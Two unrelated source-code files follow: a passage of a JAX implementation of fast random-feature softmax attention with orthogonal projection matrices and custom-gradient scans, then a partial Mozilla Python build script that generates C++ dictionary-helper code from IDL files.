) # Nonlinearity used in "Transformers are RNNs: Fast Autoregressive Transformers with Linear Attention" (https://arxiv.org/abs/2006.16236).
def nonnegative_softmax_kernel_feature_creator(data,
projection_matrix,
attention_dims_t,
batch_dims_t,
precision,
is_query,
normalize_data=True,
eps=0.0001):
"""Constructs nonnegative kernel features for fast softmax attention.
Args:
data: input for which features are computes
projection_matrix: random matrix used to compute features
attention_dims_t: tuple of attention dimensions
batch_dims_t: tuple of batch dimensions
precision: precision parameter
is_query: predicate indicating whether input data corresponds to queries or
keys
normalize_data: predicate indicating whether data should be normalized,
eps: numerical stabilizer.
Returns:
Random features for fast softmax attention.
"""
if normalize_data:
# We have e^{qk^T/sqrt{d}} = e^{q_norm k_norm^T}, where
# w_norm = w * data_normalizer for w in {q,k}.
data_normalizer = 1.0 / (jnp.sqrt(jnp.sqrt(data.shape[-1])))
else:
data_normalizer = 1.0
ratio = 1.0 / jnp.sqrt(projection_matrix.shape[0])
data_mod_shape = data.shape[0:len(batch_dims_t)] + projection_matrix.shape
data_thick_random_matrix = jnp.zeros(data_mod_shape) + projection_matrix
data_dash = lax.dot_general(
data_normalizer * data,
data_thick_random_matrix,
(((data.ndim - 1,), (data_thick_random_matrix.ndim - 1,)),
(batch_dims_t, batch_dims_t)),
precision=precision)
diag_data = jnp.square(data)
diag_data = jnp.sum(diag_data, axis=data.ndim - 1)
diag_data = (diag_data / 2.0) * data_normalizer * data_normalizer
diag_data = jnp.expand_dims(diag_data, axis=data.ndim - 1)
last_dims_t = (len(data_dash.shape) - 1,)
if is_query:
data_dash = ratio * (
jnp.exp(data_dash - diag_data -
jnp.max(data_dash, axis=last_dims_t, keepdims=True)) + eps)
else:
data_dash = ratio * (
jnp.exp(data_dash - diag_data - jnp.max(
data_dash, axis=last_dims_t + attention_dims_t, keepdims=True)) +
eps)
return data_dash
def sincos_softmax_kernel_feature_creator(data,
projection_matrix,
attention_dims_t,
batch_dims_t,
precision,
normalize_data=True):
"""Constructs kernel sin-cos features for fast softmax attention.
Args:
data: input for which features are computes
projection_matrix: random matrix used to compute features
attention_dims_t: tuple of attention dimensions
batch_dims_t: tuple of batch dimensions
precision: precision parameter
normalize_data: predicate indicating whether data should be normalized.
Returns:
Random features for fast softmax attention.
"""
if normalize_data:
# We have: exp(qk^T/sqrt{d}) = exp(|q|^2/2sqrt{d}) * exp(|k|^2/2sqrt{d}) *
# exp(-(|q*c-k*c|^2)/2), where c = 1.0 / sqrt{sqrt{d}}.
data_normalizer = 1.0 / (jnp.sqrt(jnp.sqrt(data.shape[-1])))
else:
data_normalizer = 1.0
ratio = 1.0 / jnp.sqrt(projection_matrix.shape[0])
data_mod_shape = data.shape[0:len(batch_dims_t)] + projection_matrix.shape
data_thick_random_matrix = jnp.zeros(data_mod_shape) + projection_matrix
data_dash = lax.dot_general(
data_normalizer * data,
data_thick_random_matrix,
(((data.ndim - 1,), (data_thick_random_matrix.ndim - 1,)),
(batch_dims_t, batch_dims_t)),
precision=precision)
data_dash_cos = ratio * jnp.cos(data_dash)
data_dash_sin = ratio * jnp.sin(data_dash)
data_dash = jnp.concatenate((data_dash_cos, data_dash_sin), axis=-1)
# Constructing D_data and data^{'}
diag_data = jnp.square(data)
diag_data = jnp.sum(diag_data, axis=data.ndim - 1)
diag_data = (diag_data / 2.0) * data_normalizer * data_normalizer
diag_data = jnp.expand_dims(diag_data, axis=data.ndim - 1)
# Additional renormalization for numerical stability
data_renormalizer = jnp.max(diag_data, attention_dims_t, keepdims=True)
diag_data -= data_renormalizer
diag_data = jnp.exp(diag_data)
data_prime = data_dash * diag_data
return data_prime
def generalized_kernel_feature_creator(data, projection_matrix, batch_dims_t,
precision, kernel_fn, kernel_epsilon,
normalize_data):
"""Constructs kernel features for fast generalized attention.
Args:
data: input for which features are computes
projection_matrix: matrix used to compute features
batch_dims_t: tuple of batch dimensions
precision: precision parameter
kernel_fn: kernel function used
kernel_epsilon: additive positive term added to every feature for numerical
stability
normalize_data: predicate indicating whether data should be normalized.
Returns:
Random features for fast generalized attention.
"""
if normalize_data:
data_normalizer = 1.0 / (jnp.sqrt(jnp.sqrt(data.shape[-1])))
else:
data_normalizer = 1.0
if projection_matrix is None:
return kernel_fn(data_normalizer * data) + kernel_epsilon
else:
data_mod_shape = data.shape[0:len(batch_dims_t)] + projection_matrix.shape
data_thick_random_matrix = jnp.zeros(data_mod_shape) + projection_matrix
data_dash = lax.dot_general(
data_normalizer * data,
data_thick_random_matrix,
(((data.ndim - 1,), (data_thick_random_matrix.ndim - 1,)),
(batch_dims_t, batch_dims_t)),
precision=precision)
data_prime = kernel_fn(data_dash) + kernel_epsilon
return data_prime
@gin.configurable
def make_fast_softmax_attention(qkv_dim,
renormalize_attention=True,
numerical_stabilizer=0.000001,
nb_features=256,
ortho_features=True,
ortho_scaling=0.0,
redraw_features=True,
unidirectional=False,
nonnegative_features=True,
lax_scan_unroll=1):
"""Construct a fast softmax attention method."""
logging.info(
'Fast softmax attention: %s features and orthogonal=%s, renormalize=%s',
nb_features, ortho_features, renormalize_attention)
if ortho_features:
matrix_creator = functools.partial(
GaussianOrthogonalRandomMatrix,
nb_features,
qkv_dim,
scaling=ortho_scaling)
else:
matrix_creator = functools.partial(GaussianUnstructuredRandomMatrix,
nb_features, qkv_dim)
if nonnegative_features:
def kernel_feature_creator(data,
projection_matrix,
attention_dims_t,
batch_dims_t,
precision,
is_query,
normalize_data=True):
return nonnegative_softmax_kernel_feature_creator(
data, projection_matrix, attention_dims_t, batch_dims_t, precision,
is_query, normalize_data, numerical_stabilizer)
else:
def kernel_feature_creator(data,
projection_matrix,
attention_dims_t,
batch_dims_t,
precision,
is_query,
normalize_data=True):
del is_query
return sincos_softmax_kernel_feature_creator(data, projection_matrix,
attention_dims_t,
batch_dims_t, precision,
normalize_data)
attention_fn = FastAttentionviaLowRankDecomposition(
matrix_creator,
kernel_feature_creator,
renormalize_attention=renormalize_attention,
numerical_stabilizer=numerical_stabilizer,
redraw_features=redraw_features,
unidirectional=unidirectional,
lax_scan_unroll=lax_scan_unroll).dot_product_attention
return attention_fn
@gin.configurable
def make_fast_generalized_attention(qkv_dim,
renormalize_attention=True,
numerical_stabilizer=0.0,
nb_features=256,
features_type='deterministic',
kernel_fn=jax.nn.relu,
kernel_epsilon=0.001,
redraw_features=False,
unidirectional=False,
lax_scan_unroll=1):
"""Construct a fast generalized attention menthod."""
logging.info('Fast generalized attention.: %s features and renormalize=%s',
nb_features, renormalize_attention)
if features_type == 'ortho':
matrix_creator = functools.partial(
GaussianOrthogonalRandomMatrix, nb_features, qkv_dim, scaling=False)
elif features_type == 'iid':
matrix_creator = functools.partial(GaussianUnstructuredRandomMatrix,
nb_features, qkv_dim)
elif features_type == 'deterministic':
matrix_creator = None
else:
raise ValueError('Unknown feature value type')
def kernel_feature_creator(data,
projection_matrix,
attention_dims_t,
batch_dims_t,
precision,
is_query,
normalize_data=False):
del attention_dims_t
del is_query
return generalized_kernel_feature_creator(data, projection_matrix,
batch_dims_t, precision,
kernel_fn, kernel_epsilon,
normalize_data)
attention_fn = FastAttentionviaLowRankDecomposition(
matrix_creator,
kernel_feature_creator,
renormalize_attention=renormalize_attention,
numerical_stabilizer=numerical_stabilizer,
redraw_features=redraw_features,
unidirectional=unidirectional,
lax_scan_unroll=lax_scan_unroll).dot_product_attention
return attention_fn
class RandomMatrix(object):
r"""Abstract class providing a method for constructing 2D random arrays.
Class is responsible for constructing 2D random arrays.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_2d_array(self):
raise NotImplementedError('Abstract method')
class GaussianUnstructuredRandomMatrix(RandomMatrix):
def __init__(self, nb_rows, nb_columns, key):
self.nb_rows = nb_rows
self.nb_columns = nb_columns
self.key = key
def get_2d_array(self):
return random.normal(self.key, (self.nb_rows, self.nb_columns))
class GaussianOrthogonalRandomMatrix(RandomMatrix):
r"""Class providing a method to create Gaussian orthogonal matrix.
Class is responsible for constructing 2D Gaussian orthogonal arrays.
"""
def __init__(self, nb_rows, nb_columns, key, scaling=0):
self.nb_rows = nb_rows
self.nb_columns = nb_columns
self.key = key
self.scaling = scaling
def get_2d_array(self):
nb_full_blocks = int(self.nb_rows / self.nb_columns)
block_list = []
rng = self.key
for _ in range(nb_full_blocks):
rng, rng_input = jax.random.split(rng)
unstructured_block = random.normal(rng_input,
(self.nb_columns, self.nb_columns))
q, _ = jnp.linalg.qr(unstructured_block)
q = jnp.transpose(q)
block_list.append(q)
remaining_rows = self.nb_rows - nb_full_blocks * self.nb_columns
if remaining_rows > 0:
rng, rng_input = jax.random.split(rng)
unstructured_block = random.normal(rng_input,
(self.nb_columns, self.nb_columns))
q, _ = jnp.linalg.qr(unstructured_block)
q = jnp.transpose(q)
block_list.append(q[0:remaining_rows])
final_matrix = jnp.vstack(block_list)
if self.scaling == 0:
multiplier = jnp.linalg.norm(
random.normal(self.key, (self.nb_rows, self.nb_columns)), axis=1)
elif self.scaling == 1:
multiplier = jnp.sqrt(float(self.nb_columns)) * jnp.ones((self.nb_rows))
else:
raise ValueError('Scaling must be one of {0, 1}. Was %s' % self._scaling)
return jnp.matmul(jnp.diag(multiplier), final_matrix)
class FastAttention(object):
r"""Abstract class providing a method for fast attention.
Class is responsible for providing a method <dot_product_attention> for fast
approximate attention.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def dot_product_attention(self,
query,
key,
value,
dtype=jnp.float32,
bias=None,
axis=None,
broadcast_dropout=True,
dropout_rng=None,
dropout_rate=0.,
deterministic=False,
precision=None):
"""Computes dot-product attention given query, key, and value.
This is the core function for applying fast approximate dot-product
attention. It calculates the attention weights given query and key and
combines the values using the attention weights. This function supports
multi-dimensional inputs.
Args:
query: queries for calculating attention with shape of [batch_size, dim1,
dim2, ..., dimN, num_heads, mem_channels].
key: keys for calculating attention with shape of [batch_size, dim1, dim2,
..., dimN, num_heads, mem_channels].
value: values to be used in attention with shape of [batch_size, dim1,
dim2,..., dimN, num_heads, value_channels].
dtype: the dtype of the computation (default: float32)
bias: bias for the attention weights. This can be used for incorporating
autoregressive mask, padding mask, proximity bias.
axis: axises over which the attention is applied.
broadcast_dropout: bool: use a broadcasted dropout along batch dims.
dropout_rng: JAX PRNGKey: to be used for dropout.
dropout_rate: dropout rate.
deterministic: bool, deterministic or not (to apply dropout).
precision: numerical precision of the computation see `jax.lax.Precision`
for details.
Returns:
Output of shape [bs, dim1, dim2, ..., dimN,, num_heads, value_channels].
"""
raise NotImplementedError('Abstract method')
def _numerator(z_slice_shape, precision, unroll=1):
def fwd(qs, ks, vs):
def body(p, qkv):
(q, k, v) = qkv
p += jnp.einsum('...m,...d->...md', k, v, precision=precision)
X_slice = jnp.einsum('...m,...md->...d', q, p, precision=precision)
return p, X_slice
init_value = jnp.zeros(z_slice_shape)
p, W = lax.scan(body, init_value, (qs, ks, vs), unroll=unroll)
return W, (p, qs, ks, vs)
def bwd(pqkv, W_ct):
def body(carry, qkv_xct):
p, p_ct = carry
q, k, v, x_ct = qkv_xct
q_ct = jnp.einsum('...d,...md->...m', x_ct, p, precision=precision)
p_ct += jnp.einsum('...d,...m->...md', x_ct, q, precision=precision)
k_ct = jnp.einsum('...md,...d->...m', p_ct, v, precision=precision)
v_ct = jnp.einsum('...md,...m->...d', p_ct, k, precision=precision)
p -= jnp.einsum('...m,...d->...md', k, v, precision=precision)
return (p, p_ct), (q_ct, k_ct, v_ct)
p, qs, ks, vs = pqkv
_, (qs_ct, ks_ct, vs_ct) = lax.scan(
body, (p, jnp.zeros_like(p)), (qs, ks, vs, W_ct),
reverse=True,
unroll=unroll)
return qs_ct, ks_ct, vs_ct
@jax.custom_vjp
def _numerator_impl(qs, ks, vs):
W, _ = fwd(qs, ks, vs)
return W
_numerator_impl.defvjp(fwd, bwd)
return _numerator_impl
def _denominator(t_slice_shape, precision, unroll=1):
def fwd(qs, ks):
def body(p, qk):
q, k = qk
p += k
x = jnp.einsum('...m,...m->...', q, p, precision=precision)
return p, x
p = jnp.zeros(t_slice_shape)
p, R = lax.scan(body, p, (qs, ks), unroll=unroll)
return R, (qs, ks, p)
def bwd(qkp, R_ct):
def body(carry, qkx):
p, p_ct = carry
q, k, x_ct = qkx
q_ct = jnp.einsum('...,...m->...m', x_ct, p, precision=precision)
p_ct += jnp.einsum('...,...m->...m', x_ct, q, precision=precision)
k_ct = p_ct
p -= k
return (p, p_ct), (q_ct, k_ct)
qs, ks, p = qkp
_, (qs_ct, ks_ct) = lax.scan(
body, (p, jnp.zeros_like(p)), (qs, ks, R_ct),
reverse=True,
unroll=unroll)
return (qs_ct, ks_ct)
@jax.custom_vjp
def _denominator_impl(qs, ks):
R, _ = fwd(qs, ks)
return R
_denominator_impl.defvjp(fwd, bwd)
return _denominator_impl
class FastAttentionviaLowRankDecomposition(FastAttention):
r"""Class providing a method for fast attention via low rank decomposition.
Class is responsible for providing a method <dot_product_attention> for fast
dot-product attention with the use of low rank decomposition (e.g. with
random feature maps).
"""
def __init__(self,
matrix_creator,
kernel_feature_creator,
renormalize_attention,
numerical_stabilizer,
redraw_features,
unidirectional,
lax_scan_unroll=1): # For optimal GPU performance, set to 16.
rng = random.PRNGKey(0)
self.matrix_creator = matrix_creator
self.projection_matrix = self.draw_weights(rng)
self.kernel_feature_creator = kernel_feature_creator
self.renormalize_attention = renormalize_attention
self.numerical_stabilizer = numerical_stabilizer
self.redraw_features = redraw_features
self.unidirectional = unidirectional
self.lax_scan_unroll = lax_scan_unroll
def draw_weights(self, key):
if self.matrix_creator is None:
return None
matrixrng, _ = random.split(key)
projection_matrix = self.matrix_creator(key=matrixrng).get_2d_array()
return projection_matrix
def dot_product_attention(self,
query,
key,
value,
dtype=jnp.float32,
bias=None,
axis=None,
broadcast_dropout=True,
dropout_rng=None,
dropout_rate=0.,
deterministic=False,
precision=None):
assert key.shape[:-1] == value.shape[:-1]
assert (query.shape[0:1] == key.shape[0:1] and
query.shape[-1] == key.shape[-1])
if axis is None:
axis = tuple(range(1, key.ndim - 2))
if not isinstance(axis, Iterable):
axis = (axis,)
assert key.ndim == query.ndim
assert key.ndim == value.ndim
for ax in axis:
if not (query.ndim >= 3 and 1 <= ax < query.ndim - 2):
raise ValueError('Attention axis must be between the batch '
'axis and the last-two axes.')
n = key.ndim
# Constructing projection tensor.
if self.redraw_features:
# TODO(kchoro): Get rid of the constant below.
query_seed = lax.convert_element_type(
jnp.ceil(jnp.sum(query) * 10000000.0), jnp.int32)
rng = random.PRNGKey(query_seed)
self.projection_matrix = self.draw_weights(rng)
# batch_dims is <bs, <non-attention dims>, num_heads>
batch_dims = tuple(onp.delete(range(n), axis + (n - 1,)))
# q & k -> (bs, <non-attention dims>, num_heads, <attention dims>, channels)
qk_perm = batch_dims + axis + (n - 1,)
k_extra_perm = axis + batch_dims + (n - 1,)
key_extra = key.transpose(k_extra_perm)
key = key.transpose(qk_perm)
query = query.transpose(qk_perm)
# v -> (bs, <non-attention dims>, num_heads, <attention dims>, channels)
v_perm = batch_dims + axis + (n - 1,)
value = value.transpose(v_perm)
batch_dims_t = tuple(range(len(batch_dims)))
attention_dims_t = tuple(
range(len(batch_dims),
len(batch_dims) + len(axis)))
# Constructing tensors Q^{'} and K^{'}.
query_prime = self.kernel_feature_creator(query, self.projection_matrix,
attention_dims_t, batch_dims_t,
precision, True)
key_prime = self.kernel_feature_creator(key, self.projection_matrix,
attention_dims_t, batch_dims_t,
precision, False)
if self.unidirectional:
index = attention_dims_t[0]
z_slice_shape = key_prime.shape[0:len(batch_dims_t)] + (
key_prime.shape[-1],) + (value.shape[-1],)
numerator_fn = _numerator(z_slice_shape, precision, self.lax_scan_unroll)
W = numerator_fn(
jnp.moveaxis(query_prime, index, 0),
jnp.moveaxis(key_prime, index, 0), jnp.moveaxis(value, index, 0))
# Constructing W = (Q^{'}(K^{'})^{T})_{masked}V
W = jnp.moveaxis(W, 0, index)
if not self.renormalize_attention:
# Unidirectional, not-normalized attention.
perm_inv = _invert_perm(qk_perm)
result = W.transpose(perm_inv)
return result
else:
# Unidirectional, normalized attention.
thick_all_ones = jnp.zeros(key.shape[0:-1]) + jnp.ones(
key_extra.shape[0:len(axis)])
index = attention_dims_t[0]
t_slice_shape = key_prime.shape[0:len(batch_dims_t)] + (
key_prime.shape[-1],)
denominator_fn = _denominator(t_slice_shape, precision,
self.lax_scan_unroll)
R = denominator_fn(
jnp.moveaxis(query_prime, index, 0),
jnp.moveaxis(key_prime, index, 0))
R = jnp.moveaxis(R, 0, index)
else:
contract_query = tuple(
range(len(batch_dims) + len(axis),
len(batch_dims) + len(axis) + 1))
contract_z = tuple(range(len(batch_dims), len(batch_dims) + 1))
# Constructing Z = (K^{'})^{T}V
# Z (bs, <non-attention dims>, num_heads, channels_m, channels_v)
Z = lax.dot_general(
key_prime,
value,
((attention_dims_t, attention_dims_t), (batch_dims_t, batch_dims_t)),
precision=precision)
# Constructing W = Q^{'}Z = Q^{'}(K^{'})^{T}V
# q (bs, <non-attention dims>, num_heads, <attention dims>, channels_m)
# Z (bs, <non-attention dims>, num_heads, channels_m, channels_v)
# W (bs, <non-attention dims>, num_heads, <attention dims>, channels_v)
W = lax.dot_general(
query_prime,
Z, ((contract_query, contract_z), (batch_dims_t, batch_dims_t)),
precision=precision)
if not self.renormalize_attention:
# Bidirectional, not-normalized attention.
perm_inv = _invert_perm(qk_perm)
result = W.transpose(perm_inv)
return result
else:
# Bidirectional, normalized attention.
thick_all_ones = jnp.zeros(key.shape[0:-1]) + jnp.ones(
key_extra.shape[0:len(axis)])
contract_key = tuple(
range(len(batch_dims),
len(batch_dims) + len(axis)))
contract_thick_all_ones = tuple(
range(thick_all_ones.ndim - len(axis), thick_all_ones.ndim))
# Construct T = (K^{'})^{T} 1_L
# k (bs, <non-attention dims>, num_heads, <attention dims>, channels)
T = lax.dot_general(
key_prime,
thick_all_ones, ((contract_key, contract_thick_all_ones),
(batch_dims_t, batch_dims_t)),
precision=precision)
# Construct partition function: R = Q^{'} T = Q^{'}(K^{'})^{T} 1_L
# q_p (bs, <non-attention dims>, num_heads, <attention dims>, channs_m)
# T (bs, <non-attention dims>, num_heads, channels_m)
R = lax.dot_general(
query_prime,
T, (((query_prime.ndim - 1,), (T.ndim - 1,)),
(batch_dims_t, range(0,
len(T.shape) - 1))),
precision=precision)
R = R + 2 * self.numerical_stabilizer * (
jnp.abs(R) <= self.numerical_stabilizer)
R = jnp.reciprocal(R)
R = jnp.expand_dims(R, len(R.shape))
# W (bs, <non-attention dims>, num_heads, <attention dims>, channels_v)
# R (bs, <non-attention dims>, num_heads, <attention dims>, extra_channel)
result = W * R
# back to (bs, dim1, dim2, ..., dimN, num_heads, channels)
perm_inv = _invert_perm(qk_perm)
result = result.transpose(perm_inv)
return result
def _invert_perm(perm):
perm_inv = [0] * len(perm)
for i, j in enumerate(perm):
perm_inv[j] = i
return tuple(perm_inv)
| |
#!/usr/bin/env python
# header.py - Generate C++ header files from IDL.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from codegen import *
import sys, os.path, re, xpidl, itertools
# --makedepend-output support.
make_dependencies = []
make_targets = []
def strip_begin(text, suffix):
if not text.startswith(suffix):
return text
return text[len(suffix):]
def strip_end(text, suffix):
if not text.endswith(suffix):
return text
return text[:-len(suffix)]
# Copied from dombindingsgen.py
def writeMakeDependOutput(filename):
print "Creating makedepend file", filename
f = open(filename, 'w')
try:
if len(make_targets) > 0:
f.write("%s:" % makeQuote(make_targets[0]))
for filename in make_dependencies:
f.write(' \\\n\t\t%s' % makeQuote(filename))
f.write('\n\n')
for filename in make_targets[1:]:
f.write('%s: %s\n' % (makeQuote(filename), makeQuote(make_targets[0])))
finally:
f.close()
def findIDL(includePath, interfaceFileName):
for d in includePath:
# Not os.path.join: we need a forward slash even on Windows because
# this filename ends up in makedepend output.
path = d + '/' + interfaceFileName
if os.path.exists(path):
return path
raise BaseException("No IDL file found for interface %s "
"in include path %r"
% (interfaceFileName, includePath))
def loadIDL(parser, includePath, filename):
idlFile = findIDL(includePath, filename)
if not idlFile in make_dependencies:
make_dependencies.append(idlFile)
idl = p.parse(open(idlFile).read(), idlFile)
idl.resolve(includePath, p)
return idl
class Configuration:
def __init__(self, filename):
config = {}
execfile(filename, config)
self.dictionaries = config.get('dictionaries', [])
self.special_includes = config.get('special_includes', [])
self.exclude_automatic_type_include = config.get('exclude_automatic_type_include', [])
def readConfigFile(filename):
return Configuration(filename)
def firstCap(str):
return str[0].upper() + str[1:]
def attributeVariableTypeAndName(a):
if a.realtype.nativeType('in').endswith('*'):
l = ["nsCOMPtr<%s> %s" % (a.realtype.nativeType('in').strip('* '),
a.name)]
elif a.realtype.nativeType('in').count("nsAString"):
l = ["nsString %s" % a.name]
elif a.realtype.nativeType('in').count("JS::Value"):
l = ["JS::Value %s" % a.name]
else:
l = ["%s%s" % (a.realtype.nativeType('in'),
a.name)]
return ", ".join(l)
def print_header(idl, fd, conf, dictname, dicts):
for p in idl.productions:
if p.kind == 'dictionary':
interfaces = []
base = p.base
baseiface = p
while base is not None and not base in dicts:
baseiface = baseiface.idl.getName(baseiface.base, baseiface.location)
dicts.append(base)
interfaces.append(baseiface)
base = baseiface.base
interfaces.reverse()
for iface in interfaces:
write_header(iface, fd)
if not p.name in dicts:
dicts.append(p.name)
write_header(p, fd)
def print_header_file(fd, conf):
fd.write("/* THIS FILE IS AUTOGENERATED - DO NOT EDIT */\n\n"
"#ifndef _gen_mozilla_idl_dictionary_helpers_h_\n"
"#define _gen_mozilla_idl_dictionary_helpers_h_\n\n")
fd.write("#include \"jsapi.h\"\n"
"#include \"nsError.h\"\n"
"#include \"nsString.h\"\n"
"#include \"nsCOMPtr.h\"\n\n")
# win32 namespace issues
fd.write("#undef near\n"
"\n\n")
forwards = []
attrnames = []
for d in conf.dictionaries:
idl = loadIDL(p, options.incdirs, d[1])
collect_names_and_non_primitive_attribute_types(idl, d[0], attrnames, forwards)
for c in forwards:
fd.write("class %s;\n" % c)
fd.write("\n"
"namespace mozilla {\n"
"namespace dom {\n\n")
dicts = []
for d in conf.dictionaries:
if not d[0] in set(dicts):
idl = loadIDL(p, options.incdirs, d[1])
print_header(idl, fd, conf, d[0], dicts)
fd.write("}\n"
"}\n"
"#endif\n")
def collect_names_and_non_primitive_attribute_types(idl, dictname, attrnames, forwards):
for p in idl.productions:
if p.kind == 'dictionary':
interfaces = []
base = p.base
baseiface = p
while base is not None:
baseiface = baseiface.idl.getName(baseiface.base, baseiface.location)
interfaces.append(baseiface)
base = baseiface.base
interfaces.reverse()
interfaces.append(p)
for iface in interfaces:
collect_names_and_non_primitive_attribute_types_from_interface(iface, attrnames, forwards)
def collect_names_and_non_primitive_attribute_types_from_interface(iface, attrnames, forwards):
for member in iface.members:
if isinstance(member, xpidl.Attribute):
if not member.name in attrnames:
attrnames.append(member.name)
if member.realtype.nativeType('in').endswith('*'):
t = member.realtype.nativeType('in').strip('* ')
if not t in forwards:
forwards.append(t)
def print_cpp(idl, fd, conf, dictname, dicts):
for p in idl.productions:
if p.kind == 'dictionary':
interfaces = []
base = p.base
baseiface = p
while base is not None and not base in dicts:
baseiface = baseiface.idl.getName(baseiface.base, baseiface.location)
dicts.append(base)
interfaces.append(baseiface)
base = baseiface.base
interfaces.reverse()
for iface in interfaces:
write_cpp(iface, fd)
if not p.name in dicts:
dicts.append(p.name)
write_cpp(p, fd)
def get_jsid(name):
return ("gDictionary_id_%s" % name)
def print_cpp_file(fd, conf):
fd.write("/* THIS FILE IS AUTOGENERATED - DO NOT EDIT */\n\n")
fd.write('#include "DictionaryHelpers.h"\n')
includes = []
for s in conf.special_includes:
if not s in includes:
includes.append(strip_end(s, ".h"))
for d in conf.dictionaries:
if not d[1] in includes:
includes.append(strip_end(d[1], ".idl"))
attrnames = []
for d in conf.dictionaries:
idl = loadIDL(p, options.incdirs, d[1])
collect_names_and_non_primitive_attribute_types(idl, d[0], attrnames, includes)
for c in includes:
if not c in conf.exclude_automatic_type_include:
fd.write("#include \"%s.h\"\n" % c)
fd.write("\nusing namespace mozilla::dom;\n\n")
for a in attrnames:
fd.write("static jsid %s = JSID_VOID;\n"% get_jsid(a))
fd.write("\n"
"static bool\n"
"InternStaticJSVal(JSContext* aCx, jsid &id, const char* aString)\n"
"{\n"
" if (JSString* str = JS_InternString(aCx, aString)) {\n"
" id = INTERNED_STRING_TO_JSID(aCx, str);\n"
" return true;\n"
" }\n"
" return false;\n"
"}\n\n"
"bool\n"
"InternStaticDictionaryJSVals(JSContext* aCx)\n"
"{\n"
" JSAutoRequest ar(aCx);\n"
" return\n")
for a in attrnames:
fd.write(" InternStaticJSVal(aCx, %s, \"%s\") &&\n"
% (get_jsid(a), a))
fd.write(" true;\n")
fd.write("}\n\n")
dicts = []
for d in conf.dictionaries:
if not d[0] in set(dicts):
idl = p.parse(open(findIDL(options.incdirs, d[1])).read(), d[1])
idl.resolve(options.incdirs, p)
print_cpp(idl, fd, conf, d[0], dicts)
def init_value(attribute):
realtype = attribute.realtype.nativeType('in')
realtype = realtype.strip(' ')
if attribute.defvalue is None:
if realtype.endswith('*'):
return "nullptr"
if realtype == "bool":
return "false"
if realtype.count("nsAString"):
return ""
if realtype.count("nsACString"):
return ""
if realtype.count("JS::Value"):
return "JSVAL_VOID"
return "0"
else:
if realtype.count("nsAString"):
return "NS_LITERAL_STRING(\"%s\")" % attribute.defvalue
if realtype.count("nsACString"):
return "NS_LITERAL_CSTRING(\"%s\")" % attribute.defvalue
raise IDLError("Default value is not supported for type %s" % realtype)
def write_header(iface, fd):
attributes = []
for member in iface.members:
if isinstance(member, xpidl.Attribute):
attributes.append(member)
fd.write("class %s" % iface.name)
if iface.base is not None:
fd.write(" : public %s" % iface.base)
fd.write("\n{\npublic:\n")
fd.write(" %s();\n" % iface.name)
fd.write(" ~%s();\n\n" % iface.name)
fd.write(" // If aCx or aVal is null, NS_OK is returned and \n"
" // dictionary will use the default values. \n"
" nsresult Init(JSContext* aCx, const jsval* aVal);\n")
fd.write("\n")
for member in attributes:
fd.write(" %s;\n" % attributeVariableTypeAndName(member))
fd.write("};\n\n")
def write_getter(a, iface, fd):
realtype = a.realtype.nativeType('in')
if realtype.count("JS::Value"):
fd.write(" NS_ENSURE_STATE(JS_GetPropertyById(aCx, aObj, %s, &aDict.%s));\n"
% (get_jsid(a.name), a.name))
else:
fd.write(" NS_ENSURE_STATE(JS_GetPropertyById(aCx, aObj, %s, &v));\n"
% get_jsid(a.name))
if realtype.count("bool"):
fd.write(" JSBool b;\n")
fd.write(" MOZ_ALWAYS_TRUE(JS_ValueToBoolean(aCx, v, &b));\n")
fd.write(" aDict.%s = b;\n" % a.name)
elif realtype.count("uint16_t"):
fd.write(" uint32_t u;\n")
fd.write(" NS_ENSURE_STATE(JS_ValueToECMAUint32(aCx, v, &u));\n")
fd.write(" aDict.%s = u;\n" % a.name)
elif realtype.count("int16_t"):
fd.write(" int32_t i;\n")
fd.write(" NS_ENSURE_STATE(JS_ValueToECMAInt32(aCx, v, &i));\n")
fd.write(" aDict.%s = i;\n" % a.name)
elif realtype.count("uint32_t"):
fd.write(" NS_ENSURE_STATE(JS_ValueToECMAUint32(aCx, v, &aDict.%s));\n" % a.name)
elif realtype.count("int32_t"):
fd.write(" NS_ENSURE_STATE(JS_ValueToECMAInt32(aCx, v, &aDict.%s));\n" % a.name)
elif realtype.count("uint64_t"):
fd.write(" NS_ENSURE_STATE(JS::ToUint64(aCx, v, &aDict.%s));\n" % a.name)
elif realtype.count("int64_t"):
fd.write(" NS_ENSURE_STATE(JS::ToInt64(aCx, v, &aDict.%s));\n" % a.name)
elif realtype.count("double"):
fd.write(" NS_ENSURE_STATE(JS_ValueToNumber(aCx, v, &aDict.%s));\n" % a.name)
elif realtype.count("float"):
fd.write(" double d;\n")
fd.write(" NS_ENSURE_STATE(JS_ValueToNumber(aCx, v, &d));")
fd.write(" aDict.%s = (float) d;\n" % a.name)
elif realtype.count("nsAString"):
if a.nullable:
fd.write(" xpc_qsDOMString d(aCx, v, &v, xpc_qsDOMString::eNull, xpc_qsDOMString::eNull);\n")
else:
fd.write(" xpc_qsDOMString d(aCx, v, &v, xpc_qsDOMString::eStringify, xpc_qsDOMString::eStringify);\n")
fd.write(" NS_ENSURE_STATE(d.IsValid());\n")
fd.write(" aDict.%s = d;\n" % a.name)
elif realtype.count("nsIVariant"):
fd.write(" nsCOMPtr<nsIVariant> d(already_AddRefed<nsIVariant>(XPCVariant::newVariant(ccx, v)));\n")
fd.write(" NS_ENSURE_STATE(d);\n")
fd.write(" aDict.%s = d;\n" % a.name)
elif realtype.endswith('*'):
fd.write(" %s d;\n" % realtype)
fd.write(" xpc_qsSelfRef ref;\n")
fd.write(" nsresult rv = xpc_qsUnwrapArg<%s>(aCx, v, &d, &ref.ptr, &v);\n" % realtype.strip('* '))
fd.write(" NS_ENSURE_SUCCESS(rv, rv);\n")
fd.write(" aDict.%s = d;\n" % a.name)
elif not realtype.count("JS::Value"):
raise BaseException("Unsupported type %s found in dictionary %s" % (realtype, iface.name))
def write_cpp(iface, fd):
attributes = []
for member in iface.members:
if isinstance(member, xpidl.Attribute):
attributes.append(member)
fd.write("%s::%s()" % (iface.name, iface.name))
if iface.base is not None or len(attributes) > 0:
fd.write(" :\n")
if iface.base is not None:
fd.write(" %s()" % iface.base)
if len(attributes) > 0:
fd.write(",\n")
for i in range(len(attributes)):
fd.write(" %s(%s)" % (attributes[i].name, init_value(attributes[i])))
if i < (len(attributes) - 1):
fd.write(",")
fd.write("\n")
fd.write("{")
hasnullable = False
for i in range(len(attributes)):
if attributes[i].nullable:
